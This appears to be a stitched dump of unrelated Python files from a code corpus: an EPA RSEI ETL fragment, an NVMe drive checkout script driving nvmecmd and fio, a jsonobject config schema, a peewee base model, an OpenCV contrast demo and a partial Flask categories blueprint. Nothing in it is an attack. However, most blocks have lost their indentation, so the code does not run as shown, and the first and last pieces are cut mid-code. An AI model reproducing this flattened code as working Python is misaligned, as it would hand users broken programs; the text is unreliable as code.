# Please note this: https://www.epa.gov/rsei/understanding-rsei-results#what
# Section: "What does a high RSEI Score mean?"
# This was created for the sole purpose to be used in the current
# iteration of Score L
self.df[
field_names.EPA_RSEI_SCORE_FIELD
+ field_names.PERCENTILE_FIELD_SUFFIX
] = self.df[field_names.EPA_RSEI_SCORE_FIELD].rank(
ascending=True,
pct=True,
)
# This threshold was arbitrarily chosen.
# It would make sense to enrich this with facilities, industries, or chemical
# that would enable some additional form of sub-stratification when examining
# different percentile ranges that are derived above.
self.df[field_names.EPA_RSEI_SCORE_THRESHOLD_FIELD] = (
self.df[
field_names.EPA_RSEI_SCORE_FIELD
+ field_names.PERCENTILE_FIELD_SUFFIX
]
>= self.EPA_RSEI_SCORE_THRESHOLD_CUTOFF
)
expected_census_tract_field_length = 11
self.df[self.GEOID_TRACT_FIELD_NAME] = (
self.df[self.GEOID_TRACT_FIELD_NAME]
.astype(str)
.apply(lambda x: x.zfill(expected_census_tract_field_length))
)
if len(self.df[self.GEOID_TRACT_FIELD_NAME].str.len().unique()) != 1:
raise ValueError(
f"GEOID Tract must be length of {expected_census_tract_field_length}"
)
def validate(self) -> None:
logger.info("Validating data.")
pass
def load(self) -> None:
logger.info("Saving CSV")
self.OUTPUT_PATH.mkdir(parents=True, exist_ok=True)
self.df[self.COLUMNS_TO_KEEP].to_csv(
path_or_buf=self.OUTPUT_PATH / "usa.csv", index=False
)
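if __name__ == "__main__":
    # Hypothetical manual run, not part of the pipeline: the project normally drives ETL
    # classes through its own runner, but the steps defined above can be invoked directly.
    etl = EPARiskScreeningEnvironmentalIndicatorsETL()
    etl.extract()
    etl.transform()
    etl.validate()
    etl.load()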
|
StarcoderdataPython
|
12812043
|
#--------------------------------------------------------------------------------------------------------------------
# Example python script that runs a few functional tests on NVMe drives. Goal is to demonstrate how to use nvmecmd
# and fio to define custom NVMe tests. This is an example only and is not a comprehensive set of tests.
#
# For new drives use the --new switch to check the drive against new-drive.rules.json
# To use custom cmd and/or rules use --path to specify directory with cmd and rules subdirectories
#--------------------------------------------------------------------------------------------------------------------
# Copyright(c) 2021 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#--------------------------------------------------------------------------------------------------------------------
import sys,os, argparse, time, logging, csv
from test import *
from datetime import datetime
#--------------------------------------------------------------------------------------------------------------------
# Read the command line parameters using argparse
#--------------------------------------------------------------------------------------------------------------------
parser = argparse.ArgumentParser(description='Runs functional tests on NVMe drive', formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--nvme', type=int, default=0, help='NVMe drive number', metavar='#')
parser.add_argument('--volume', type=str, default=DEFAULT_VOLUME, help='Volume to run fio (e.g. c:)', metavar='<dir>')
parser.add_argument('--dir', type=str, default='', help='Directory to log results', metavar='<dir>')
parser.add_argument('--path', type=str, default=NVMECMD_RESOURCES, help='Path to directory with cmd and rules subdirectories', metavar='<dir>')
parser.add_argument('--new', default=False, action=argparse.BooleanOptionalAction, help="Checks new-drives rules")
parser.add_argument('--tests', type=int, nargs="+", default=[1,2,3,4,5,6,7,8,9], help="List of tests to run (e.g. 1 4 5 6)")
args = parser.parse_args()
if os.path.dirname(args.volume) != args.volume:
print(f"Volume {args.volume} is not a legal volume. Windows example: c:")
os._exit(1)
if args.dir == "":
args.dir = os.path.join(os.path.abspath('.'), 'checkout', datetime.now().strftime("%Y%m%d_%H%M%S"))
#--------------------------------------------------------------------------------------------------------------------
# Setup the logging
#--------------------------------------------------------------------------------------------------------------------
try:
os.makedirs(args.dir)
except FileExistsError:
pass
except:
logger.error(f">>>> FATAL ERROR: Failed to make directory {args.dir}")
os._exit(1)
logger = logging.getLogger('nvme_logger')
fileHandler = logging.FileHandler(os.path.join(args.dir,'checkout.log'))
fileHandler.setFormatter(logFormatter)
logger.addHandler(fileHandler)
#--------------------------------------------------------------------------------------------------------------------
# Setup vars
#--------------------------------------------------------------------------------------------------------------------
cmd_directory = os.path.join(args.path) # User specifies location for this
rules_directory = os.path.join(args.path) # User specifies location for this
script_errors = 0 # Track script errors here for return value
step = {}
idle_times_ms = [0,20,50,70,90,150,200,500,700,900,1000,1200,1500 ]
#--------------------------------------------------------------------------------------------------------------------
# Start testing...
#--------------------------------------------------------------------------------------------------------------------
try:
#################################################################################################################
# Test - Verify new-drive and feature rules
#################################################################################################################
if 1 in args.tests or 9 in args.tests:
test = start_test(1,"Nvme-Verify-Info",args.dir)
#-------------------------------------------------------------------
# Step 1: Read info and verify against customer features
#-------------------------------------------------------------------
step = start_step("Verify-Features-And-Errors",test)
working_directory = f"{step['directory']}" # directory created by start_step for logging
cmd_file = os.path.join(cmd_directory,'read.cmd.json') # use cmd file from the specified path
rules_file = os.path.join(rules_directory,'user-features.rules.json') # use rules file from the specified path
ref_info_file = os.path.join(working_directory,"nvme.info.json")
nvmecmd_args = [NVMECMD, # path to nvmecmd executable defined in lib
f"{cmd_file}", # cmd file to read the NVMe information
"--dir",f"{working_directory}", # log to the directory created by start_step
"--rules",f"{rules_file}", # Verify features rules
"--nvme",f"{args.nvme}"] # NVMe drive number
step['code'] = run_step_process(nvmecmd_args, working_directory) # run nvmecmd in directory created by start_step
log_report(ref_info_file,args.nvme,False) # Display the report on the NVMe drive being tested
test['errors'] += end_step(step)
#-------------------------------------------------------------------
# Step 2: If --new specified verify info against new-drive rules
#-------------------------------------------------------------------
if args.new:
step = start_step("Verify-New-Drive-Rules",test)
working_directory = f"{step['directory']}" # directory created by start_step for logging
cmd_file = os.path.join(cmd_directory,'read.cmd.json') # use cmd file from the specified path
rules_file = os.path.join(rules_directory,'unused-drive.rules.json') # use rules file from the specified path
nvmecmd_args = [NVMECMD, # path to nvmecmd executable defined in lib
f"{cmd_file}", # cmd file to read the NVMe information
"--dir",f"{working_directory}", # log to the directory created by start_step
"--rules",f"{rules_file}", # Verify new drive rules
"--nvme",f"{args.nvme}"] # NVMe drive number
step['code'] = run_step_process(nvmecmd_args, working_directory) # run process in directory created by start_step
test['errors'] += end_step(step)
script_errors += end_test(test)
#-------------------------------------------------------------------
# If test failed abort so can update the cmd/rules if needed
#-------------------------------------------------------------------
if script_errors:
os._exit(test['errors'])
#################################################################################################################
# Test - Run Self-Tests
#################################################################################################################
if 2 in args.tests:
test = start_test(2,"Nvme-Self-Tests",args.dir)
#-------------------------------------------------------------------
# Step 1: Run short self-test
#-------------------------------------------------------------------
step = start_step("Short-Self-Test",test)
working_directory = f"{step['directory']}" # directory created by start_step for logging
cmd_file = os.path.join(cmd_directory,'self-test.cmd.json') # use cmd file from the specified path
nvmecmd_args = [NVMECMD, # path to nvmecmd executable defined in lib
f"{cmd_file}", # cmd file to run the short self-test
"--dir",f"{working_directory}", # log to the directory created by start_step
"--nvme",f"{args.nvme}"] # NVMe drive number
step['code'] = run_step_process(nvmecmd_args, working_directory)
test['errors'] += end_step(step)
if platform.system() == "Windows":
logger.info("\t\tWaiting 10 minutes for Windows workaround")
logger.info("")
time.sleep(600)
#-------------------------------------------------------------------
# Step 2: Run extended self-test
#-------------------------------------------------------------------
step = start_step("Extended-Self-Test",test)
working_directory = f"{step['directory']}" # directory created by start_step for logging
cmd_file = os.path.join(cmd_directory,'self-test.cmd.json') # use cmd file from the specified path
nvmecmd_args = [NVMECMD, # path to nvmecmd executable defined in lib
f"{cmd_file}", # cmd file to run the extended self-test
"--dir",f"{working_directory}", # log to the directory created by start_step
"--extended", # run the extended self-test
"--nvme",f"{args.nvme}"] # NVMe drive number
step['code'] = run_step_process(nvmecmd_args, working_directory)
test['errors'] += end_step(step)
script_errors += end_test(test)
#-------------------------------------------------------------------
# If test failed abort so can update the cmd/rules if needed
#-------------------------------------------------------------------
if script_errors:
os._exit(test['errors'])
#################################################################################################################
# Test - Check admin command reliability
#################################################################################################################
if 3 in args.tests:
test = start_test(3,"Command-Reliability",args.dir)
#-------------------------------------------------------------------
# Step 1: Read info, verify against customer features, and compare
#-------------------------------------------------------------------
step = start_step("Read-Verify-Compare-1K",test)
working_directory = f"{step['directory']}" # directory created by start_step for logging
cmd_file = os.path.join(cmd_directory,'read.cmd.json') # use cmd file from the specified path
rules_file = os.path.join(rules_directory,'user-features.rules.json') # use rules file from the specified path
summary_file = os.path.join(working_directory,"read.summary.json")
nvmecmd_args = [NVMECMD, # path to nvmecmd executable defined in lib
f"{cmd_file}", # cmd file to read the NVMe information
"--dir",f"{working_directory}", # log to the directory created by start_step
"--rules",f"{rules_file}", # Verify features rules
"--samples","1000", # set number of samples to read
"--interval","500", # set interval in mS
"--nvme",f"{args.nvme}"] # NVMe drive number. e.g. 0 for nvme0 or physicaldrive0
step['code'] = run_step_process(nvmecmd_args, working_directory)
test['errors'] += end_step(step)
#-------------------------------------------------------------------
# Parse the data on the admin commands
#-------------------------------------------------------------------
step = start_step("Log-Admin-Times",test)
csv_path = os.path.join(step['directory'],"admin_commands.csv")
step['code'] = parse_admin_commands( summary_file, csv_path)
test['errors'] += end_step(step)
script_errors += end_test(test)
#################################################################################################################
# Test - Log Page 2 Sweep (SMART baseline)
#################################################################################################################
if 4 in args.tests:
test = start_test(4,"LogPage02-Sweep",args.dir)
step = start_step("Read",test)
logger.info("")
with open(os.path.join(f"{step['directory']}","logpage2_sweep.csv"), mode='w', newline='') as results_csv_file:
csv_writer = csv.writer(results_csv_file, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
csv_writer.writerow(['Idle(ms)','Avg(ms)','Min(ms)','Max(ms)','Count'])
for interval in idle_times_ms:
working_directory = os.path.join(f"{step['directory']}",f"{interval}mS")
os.makedirs(working_directory)
cmd_file = os.path.join(cmd_directory,f"logpage02.cmd.json")
summary_file = os.path.join(working_directory,"read.summary.json")
csv_path = os.path.join( working_directory, "admin_commands.csv")
if interval > 999: sample = 100
else: sample = 200
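# use fewer samples at the longer idle intervals so the sweep completes in a reasonable time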
nvmecmd_args = [NVMECMD, # path to nvmecmd executable defined in lib
f"{cmd_file}", # cmd file to read the NVMe information
"--samples",f"{sample}",
"--interval",f"{interval}", # set interval in mS
"--dir",f"{working_directory}", # log to the directory created by start_step
"--nvme",f"{args.nvme}"] # NVMe drive number
step['code'] += run_step_process(nvmecmd_args, working_directory)
avg_ms, min_ms, max_ms, count = get_admin_command("Get Log Page 2", summary_file, csv_path, 2)
interval_name = f"Idle {interval}mS then read log page"
logger.info(f"\t {interval_name:35} Avg: {avg_ms:6.2f}mS Min: {min_ms:6.2f}mS Max: {max_ms:6.2f}mS Count: {count:6}")
csv_writer.writerow([f"{interval}",f"{avg_ms}",f"{min_ms}",f"{max_ms}",f"{count}"])
logger.info("")
test['errors'] += end_step(step)
script_errors += end_test(test)
#################################################################################################################
# Test - Log Page 3 Sweep
#################################################################################################################
if 5 in args.tests:
test = start_test(5,"LogPage03-Sweep",args.dir)
step = start_step("Read",test)
logger.info("")
with open(os.path.join(f"{step['directory']}","logpage3_sweep.csv"), mode='w', newline='') as results_csv_file:
csv_writer = csv.writer(results_csv_file, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
csv_writer.writerow(['Idle(ms)','Avg(ms)','Min(ms)','Max(ms)','Count'])
for interval in idle_times_ms:
working_directory = os.path.join(f"{step['directory']}",f"{interval}mS")
os.makedirs(working_directory)
cmd_file = os.path.join(cmd_directory,f"logpage03.cmd.json")
summary_file = os.path.join(working_directory,"read.summary.json")
csv_path = os.path.join( working_directory, "admin_commands.csv")
if interval > 999: sample = 100
else: sample = 200
nvmecmd_args = [NVMECMD, # path to nvmecmd executable defined in lib
f"{cmd_file}", # cmd file to read the NVMe information
"--samples",f"{sample}",
"--interval",f"{interval}", # set interval in mS
"--dir",f"{working_directory}", # log to the directory created by start_step
"--nvme",f"{args.nvme}"] # NVMe drive number
step['code'] += run_step_process(nvmecmd_args, working_directory)
avg_ms, min_ms, max_ms, count = get_admin_command("Get Log Page 3", summary_file, csv_path, 2)
interval_name = f"Idle {interval}mS then read log page"
logger.info(f"\t {interval_name:35} Avg: {avg_ms:6.2f}mS Min: {min_ms:6.2f}mS Max: {max_ms:6.2f}mS Count: {count:6}")
csv_writer.writerow([f"{interval}",f"{avg_ms}",f"{min_ms}",f"{max_ms}",f"{count}"])
logger.info("")
test['errors'] += end_step(step)
script_errors += end_test(test)
#################################################################################################################
# Setup fio target file if using fio
#################################################################################################################
if (6 in args.tests) or (7 in args.tests) or (8 in args.tests):
temp_fio_target_file = os.path.abspath( os.path.join(args.volume,os.sep,"fio","target.bin"))
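# fio parses ':' in --filename as a list separator, so the Windows drive-letter colon is escaped below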
fio_target_file = temp_fio_target_file.replace(":",r"\:")
working_directory = os.path.join(args.dir,'fio_setup')
os.makedirs(working_directory)
try:
os.remove(temp_fio_target_file)
except:
pass
fio_startup_delay = 420 # delay in seconds before starting fio after monitor to get baseline
fio_size = '16g' # file size
fio_end_delay = 420 # delay to wait after fio completes, allows drive to cool down
fio_runtime = 720 # time in seconds to run fio
fio_rand_block_sizes = ['4k'] # block sizes for fio
fio_rand_read_percent = ['0','100'] # do read and write for fio
fio_rand_threads = 1 # number of threads for fio
fio_rand_depth = 8 # queue depth
fio_seq_block_sizes = ['1024k'] # block sizes for fio
fio_seq_read_percent = ['0','100'] # do read and write for fio
fio_seq_threads = 2 # number of threads for fio
fio_seq_depth = 64 # queue depth
fio_base_args = [FIO, # path to fio executable
"--name=fio-setup", # name for job
f"--ioengine={FIO_ASYNC_IO}",             # asynchronous IO engine (Windows/Linux are different)
"--direct=1", # non-buffered IO
"--numjobs=1", # Number of threads
"--thread", # Generate threads
"--rw=write", # Access seq for speed
"--iodepth=32", # Big queue depth for speed
"--bs=1024k", # Big block size for speed
"--output-format=json", # Use json output so easy to read and parse later
f"--filename={fio_target_file}", # use one file so generated only once
f"--size={fio_size}"] # size of data
setup_result = run_step_process(fio_base_args, working_directory,300)
#-------------------------------------------------------------------
# If test failed abort so can update the cmd/rules if needed
#-------------------------------------------------------------------
if setup_result:
os._exit(1)
#################################################################################################################
# Test - Random Read Sweep
#################################################################################################################
if 6 in args.tests:
test = start_test(6,"Random-Read-Sweep",args.dir)
step = start_step("Read",test)
fio_base_args = [FIO, # path to fio executable
"--name=fio-burst", # name for job
f"--ioengine={FIO_ASYNC_IO}",             # asynchronous IO engine (Windows/Linux are different)
"--direct=1", # non-buffered IO
"--numjobs=1", # Number of threads
"--thread", # Generate threads
"--rw=randread", # Access randomly
"--iodepth=1", # IO or queue depth
"--thinktime_blocks=1", # read one block then wait
"--bs=4k", # one 4K block
"--runtime=180", # run time in seconds
"--time_based", # run time specified
"--output-format=json", # Use json output so easy to read and parse later
f"--filename={fio_target_file}", # use one file so generated only once
f"--size={fio_size}"]
# log summary in a csv file and fio files in subdirectories named after interval time
with open(os.path.join(f"{step['directory']}","random_read_sweep.csv"), mode='w', newline='') as results_csv_file:
csv_writer = csv.writer(results_csv_file, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
csv_writer.writerow(['Idle(ms)','Avg(ms)','Min(ms)','Max(ms)','Count'])
for interval in idle_times_ms:
working_directory = os.path.join(f"{step['directory']}",f"{interval}mS")
os.makedirs(working_directory)
if interval == 0: thinktime_us = 1
else: thinktime_us = interval * 1000
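# fio --thinktime is given in microseconds; use 1us for the no-idle case so the option stays in effect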
fio_args = fio_base_args.copy()
fio_args.append(f"--output={working_directory}\\fio.json")
fio_args.append(f"--thinktime={thinktime_us}")
test['errors'] += run_step_process(fio_args, working_directory, 240)
ref_file = open(f"{working_directory}\\fio.json")
json_fio = json.load(ref_file)
ref_file.close()
min_ms = float(json_fio['jobs'][0]['read']['lat_ns']['min'])/NS_IN_MS
max_ms = float(json_fio['jobs'][0]['read']['lat_ns']['max'])/NS_IN_MS
avg_ms = float(json_fio['jobs'][0]['read']['lat_ns']['mean'])/NS_IN_MS
count = int(json_fio['jobs'][0]['read']['lat_ns']['N'])
interval_name = f"Idle {interval}mS then random 4k read"
logger.info(f"\t {interval_name:40} Avg: {avg_ms:6.2f}mS Min: {min_ms:6.2f}mS Max: {max_ms:6.2f}mS Count: {count:6}")
csv_writer.writerow([f"{interval}",f"{avg_ms}",f"{min_ms}",f"{max_ms}",f"{count}"])
logger.info("")
test['errors'] += end_step(step)
script_errors += end_test(test)
#################################################################################################################
# Test - Random Performance, single burst, fast monitor
#################################################################################################################
if 7 in args.tests:
test = start_test(7,"Random-Performance-Monitor",args.dir)
#-------------------------------------------------------------------
# Step 1: Start nvmecmd and let run until done
#-------------------------------------------------------------------
step = start_step("Start-Monitor",test)
working_directory = monitor_directory = f"{step['directory']}"
cmd_file = os.path.join(cmd_directory,'logpage02.cmd.json')
summary_file = os.path.join(working_directory,"read.summary.json")
nvmecmd_args = [NVMECMD, # path to nvmecmd executable defined in lib
f"{cmd_file}", # cmd file to read log page 2 every few seconds until ctrl-c sent to app
"--dir",f"{working_directory}", # run in the working directory
"--samples","1000000", # set number of samples to read
"--interval","2000", # set interval in mS
"--nvme",f"{args.nvme}"] # NVMe drive number. e.g. 0 for nvme0 or physicaldrive0
nvmecmd_process, nvmecmd_start_time = start_step_process(nvmecmd_args, working_directory)
if nvmecmd_process is None:
logger.error('>>>> FATAL ERROR: nvmecmd failed to start. Verify nvmecmd installed correctly')
os._exit(TEST_CASE_EXCEPTION)
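# Wait out the fio startup delay; a TimeoutExpired below means the monitor is still running, which is the expected path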
try:
nvmecmd_process.wait(fio_startup_delay)
logger.error('>>>> FATAL ERROR: Test aborted because nvmecmd exited. Verify NVMe drive number is correct')
os._exit(TEST_CASE_EXCEPTION)
except subprocess.TimeoutExpired:
pass
test['errors'] += end_step(step)
#-------------------------------------------------------------------
# Run fio
#-------------------------------------------------------------------
fio_file_paths = [] # Save file paths here so can parse later
fio_base_args = [FIO, # path to fio executable
"--name=fio-burst", # name for job
f"--ioengine={FIO_ASYNC_IO}",             # asynchronous IO engine (Windows/Linux are different)
"--direct=1", # non-buffered IO
f"--numjobs={fio_rand_threads}", # Number of threads
"--thread", # Generate threads
"--rw=randrw", # Access randomly
f"--iodepth={fio_rand_depth}", # IO or queue depth
f"--runtime={fio_runtime}", # run time in seconds
"--time_based", # run time specified
"--output-format=json", # Use json output so easy to read and parse later
f"--filename={fio_target_file}", # use one file so generated only once
f"--size={fio_size}"] # size of data
for read_percentage in fio_rand_read_percent:
for block_size in fio_rand_block_sizes:
step = start_step(f"fio-rd{read_percentage}-bs4K",test)
working_directory = f"{step['directory']}" # directory created by start_step for logging
fio_args = fio_base_args.copy() # fresh copy for each step
fio_args.append(f"--output={working_directory}\\fio.json") # log to directory created by start_step
fio_args.append(f"--rwmixread={read_percentage}") # set read percentage
fio_args.append(f"--bs={block_size}") # set block size
fio_file_paths.append(f"{working_directory}\\fio.json") # track log file for later use
test['errors'] += run_step_process(fio_args, working_directory,(fio_runtime + 300))
time.sleep(fio_end_delay)
test['errors'] += end_step(step)
#-------------------------------------------------------------------
# Signal nvmecmd to finish to stop monitoring
#-------------------------------------------------------------------
step = start_step("Stop-Monitor",test)
step['code'] = stop_monitor(monitor_directory, nvmecmd_process)
test['errors'] += end_step(step)
#-------------------------------------------------------------------
# Parse the data on the admin commands
#-------------------------------------------------------------------
step = start_step("Parse-Admin-Commands",test)
csv_path = os.path.join(step['directory'],"admin_commands.csv")
step['code'] = parse_admin_commands( summary_file, csv_path)
test['errors'] += end_step(step)
#-------------------------------------------------------------------
# Parse the fio data
#-------------------------------------------------------------------
step = start_step("Parse-Fio",test)
step['code'] = parse_fio_data(fio_file_paths,temp_fio_target_file)
test['errors'] += end_step(step)
script_errors += end_test(test)
#################################################################################################################
# Test - Sequential Performance, single burst, fast monitor
#################################################################################################################
if 8 in args.tests:
test = start_test(8,"Sequential-Performance-Monitor",args.dir)
#-------------------------------------------------------------------
# Step 1: Start nvmecmd and let run until done
#-------------------------------------------------------------------
step = start_step("Start-Monitor",test)
working_directory = monitor_directory = f"{step['directory']}"
cmd_file = os.path.join(cmd_directory,'logpage02.cmd.json')
summary_file = os.path.join(working_directory,"read.summary.json")
nvmecmd_args = [NVMECMD, # path to nvmecmd executable defined in lib
f"{cmd_file}", # cmd file to read log page 2 every few seconds until ctrl-c sent to app
"--dir",f"{working_directory}", # run in the working directory
"--samples","1000000", # set number of samples to read
"--interval","2000", # set interval in mS
"--nvme",f"{args.nvme}"] # NVMe drive number. e.g. 0 for nvme0 or physicaldrive0
nvmecmd_process, nvmecmd_start_time = start_step_process(nvmecmd_args, working_directory)
if nvmecmd_process is None:
logger.error('>>>> FATAL ERROR: nvmecmd failed to start. Verify nvmecmd installed correctly')
os._exit(TEST_CASE_EXCEPTION)
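# As in test 7: a TimeoutExpired below means the monitor is still running, which is the expected path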
try:
nvmecmd_process.wait(fio_startup_delay)
logger.error('>>>> FATAL ERROR: Test aborted because nvmecmd exited. Verify NVMe drive number is correct')
os._exit(TEST_CASE_EXCEPTION)
except subprocess.TimeoutExpired:
pass
test['errors'] += end_step(step)
#-------------------------------------------------------------------
# Run fio
#-------------------------------------------------------------------
fio_file_paths = [] # Save file paths here so can parse later
fio_base_args = [FIO, # path to fio executable
"--name=fio-burst", # name for job
f"--ioengine={FIO_ASYNC_IO}",             # asynchronous IO engine (Windows/Linux are different)
"--direct=1", # non-buffered IO
f"--numjobs={fio_seq_threads}", # Number of threads
"--thread", # Generate threads
"--rw=rw",                                # Sequential mixed read/write access
f"--iodepth={fio_seq_depth}", # IO or queue depth
f"--runtime={fio_runtime}", # run time in seconds
"--time_based", # run time specified
"--output-format=json", # Use json output so easy to read and parse later
f"--filename={fio_target_file}", # use one file so generated only once
f"--size={fio_size}"] # size of data
for read_percentage in fio_seq_read_percent:
for block_size in fio_seq_block_sizes:
step = start_step(f"fio-rd{read_percentage}-bs{block_size}",test)
working_directory = f"{step['directory']}" # directory created by start_step for logging
fio_args = fio_base_args.copy() # fresh copy for each step
fio_args.append(f"--output={working_directory}\\fio.json") # log to directory created by start_step
fio_args.append(f"--rwmixread={read_percentage}") # set read percentage
fio_args.append(f"--bs={block_size}") # set block size
fio_file_paths.append(f"{working_directory}\\fio.json") # track log file for later use
test['errors'] += run_step_process(fio_args, working_directory,(fio_runtime + 300))
time.sleep(fio_end_delay)
test['errors'] += end_step(step)
#-------------------------------------------------------------------
# Signal nvmecmd to finish to stop monitoring
#-------------------------------------------------------------------
step = start_step("Stop-Monitor",test)
step['code'] = stop_monitor(monitor_directory, nvmecmd_process)
test['errors'] += end_step(step)
#-------------------------------------------------------------------
# Parse the data on the admin commands
#-------------------------------------------------------------------
step = start_step("Parse-Admin-Commands",test)
csv_path = os.path.join(step['directory'],"admin_commands.csv")
step['code'] = parse_admin_commands( summary_file, csv_path)
test['errors'] += end_step(step)
#-------------------------------------------------------------------
# Parse the fio data
#-------------------------------------------------------------------
step = start_step("Parse-Fio",test)
step['code'] = parse_fio_data(fio_file_paths,temp_fio_target_file)
test['errors'] += end_step(step)
script_errors += end_test(test)
#################################################################################################################
# Test - Compare date and time references
#################################################################################################################
if 9 in args.tests:
test = start_test(9,"Nvme-Compare-Times",args.dir)
#-------------------------------------------------------------------
# Step 1: Get latest information
#-------------------------------------------------------------------
step = start_step("Read-Drive-Info",test)
working_directory = f"{step['directory']}" # directory created by start_step for logging
cmd_file = os.path.join(cmd_directory,'read.cmd.json') # use cmd file from the specified path
last_info_file = os.path.join(working_directory,"nvme.info.json") # save this for compare
nvmecmd_args = [NVMECMD, # path to nvmecmd executable defined in lib
f"{cmd_file}", # cmd file to read the NVMe information
"--dir",f"{working_directory}", # log to the directory created by start_step
"--nvme",f"{args.nvme}"] # NVMe drive number
step['code'] = run_step_process(nvmecmd_args, step['directory']) # run process in directory created by start_step
test['errors'] += end_step(step)
#-------------------------------------------------------------------
# Step 2: Compare date and times against the reference
#-------------------------------------------------------------------
step = start_step("Compare-Time",test)
step['code'] = compare_time(ref_info_file, last_info_file) # this function defined in test.py
test['errors'] += end_step(step)
script_errors += end_test(test)
#################################################################################################################
# Exit the script
#################################################################################################################
try: os.remove(temp_fio_target_file)
except: pass
os._exit(script_errors)
except:
logger.exception('ERROR: Checkout script aborted because of unhandled exception:')
os._exit(1)
|
StarcoderdataPython
|
4966145
|
<filename>src/commcare_cloud/environment/schemas/meta.py
import jsonobject
class MetaConfig(jsonobject.JsonObject):
_allow_dynamic_properties = False
deploy_env = jsonobject.StringProperty(required=True)
env_monitoring_id = jsonobject.StringProperty(required=True)
users = jsonobject.ListProperty(unicode, required=True)
slack_alerts_channel = jsonobject.StringProperty()
bare_non_cchq_environment = jsonobject.BooleanProperty(default=False)
|
StarcoderdataPython
|
4843650
|
import peewee as pw
from datetime import datetime
from playhouse.shortcuts import model_to_dict
from src.db import db
class BaseModel(pw.Model):
created_at = pw.DateTimeField(default=datetime.utcnow)
updated_at = pw.DateTimeField(default=datetime.utcnow)
def to_dict(self):
return model_to_dict(self)
def save(self, *args, **kwargs):
self.updated_at = datetime.utcnow()  # keep consistent with the utcnow defaults above
return super().save(*args, **kwargs)
class Meta:
database = db
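# Usage sketch (illustrative only; 'Note' is a hypothetical subclass, not part of this module):
# class Note(BaseModel):
#     text = pw.CharField()
# note = Note.create(text="hello")
# note.to_dict()  # -> dict including created_at/updated_at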
|
StarcoderdataPython
|
3317104
|
import numpy as np
import cv2
from math import ceil
# a very basic contrast adjustment:
# every pixel is multiplied by a fixed factor, rounded up, and clamped to 255
def app_cont(image, contrast):
h, w = image.shape
new_image = np.zeros((h, w), dtype=np.uint8)
for i in range(h):
for j in range(w):
b = ceil(image[i][j] * contrast)
if b > 255:
b = 255
new_image[i][j] = b
return new_image
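# Equivalent vectorized sketch (illustrative, not part of the original script): numpy applies
# the multiply, ceil and 255 clamp in one pass, avoiding the slow per-pixel loops.
def app_cont_vectorized(image, contrast):
    return np.clip(np.ceil(image.astype(np.float64) * contrast), 0, 255).astype(np.uint8)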
if __name__ == "__main__":
# change the image location to your own image location
image = cv2.imread('/home/biscuit/Python-files/images/bookpage.jpg')
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
contrast = 1.6
cont_img = app_cont(gray, contrast)
cv2.imshow('original', gray)
cv2.imshow('contrasted', cont_img)
cv2.imwrite('simple_contrast.jpg', cont_img)
cv2.waitKey(0)
cv2.destroyAllWindows()
# END
|
StarcoderdataPython
|
3391436
|
<gh_stars>0
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
FreeFrom Categories Python module
Version 1.1.1
"""
# Import dependencies
from flask import (
Blueprint, flash, render_template, redirect, request, url_for)
from bson.objectid import ObjectId
from forms import CategoryForm
# Import PyMongo database instance
from database import mongo
# Initiate Blueprint
categories = Blueprint(
"categories", __name__, static_folder="static",
template_folder="templates")
@categories.route("/category_add", methods=["GET", "POST"])
def category_add():
"""
Route for category add
"""
# request Form data
form = CategoryForm(request.form)
if request.method == "POST" and form.validate():
# Set new category name variable
category_name = form.name.data.lower()
if category_check(category_name):
# Add new category to the database
mongo.db.categories.insert_one({"name": category_name})
# Display flash message
flash(
"Category " + category_name +
" successfully added", "success")
return redirect(url_for('products.search'))
else:
return render_template("category_add.html", form=form)
return render_template("category_add.html", form=form)
@categories.route("/categories_edit", methods=["GET", "POST"])
def category_edit():
"""
Route for category edit
"""
# request Form data
form = CategoryForm(request.form)
# Get categories collection from database
categories = mongo.db.categories.find().sort("name", 1)
existing_category_name = None
if request.method == "POST":
existing_category_name = category_get_selection("Update")
if request.method == "POST" and form.validate():
category_name = form.name.data.lower()
if existing_category_name and category_check(category_name):
category_id = category_get_id(existing_category_name)
# Update category in the database
if category_id:
category_update(category_id, category_name)
return redirect(url_for('products.search'))
else:
return redirect(url_for('categories.category_edit'))
else:
return render_template(
"category_edit.html", categories=categories,
existing_category_name=existing_category_name,
form=form)
return render_template(
"category_edit.html", categories=categories,
existing_category_name=existing_category_name, form=form)
@categories.route("/categories_delete", methods=["GET", "POST"])
def category_delete():
"""
Route for category delete
"""
# Get categories collection from database
categories = mongo.db.categories.find().sort("name", 1)
if request.method == "POST":
# Get existing category name
existing_category_name = request.form.get(
"categorySelector").lower()
# Check if category has been selected from drop down
if existing_category_name:
if existing_category_name == "category...":
# Display flash message
flash("Please select Category to delete", "warning")
proceed = False
else:
proceed = True
else:
# Display flash message
flash("Please select Category to delete", "warning")
proceed = False
if proceed:
# Get category
category = mongo.db.categories.find_one(
{"name": existing_category_name})
# Check if category is still in database
if category:
category_id = category["_id"]
return render_template(
"category_delete_confirm.html",
category_id=category_id, category=category)
else:
# Display flash message
flash(
"Ooops.... category " + existing_category_name +
" no longer exists in the database", "danger")
return redirect(url_for('categories.category_delete'))
else:
return render_template(
"category_delete.html", categories=categories)
return render_template(
"category_delete.html", categories=categories)
@categories.route(
"/categories_delete_confirm/<category_id>",
methods=["GET", "POST"])
def category_delete_confirm(category_id):
"""
Route for category delete confirm
"""
if request.method == "POST":
# Get category from database
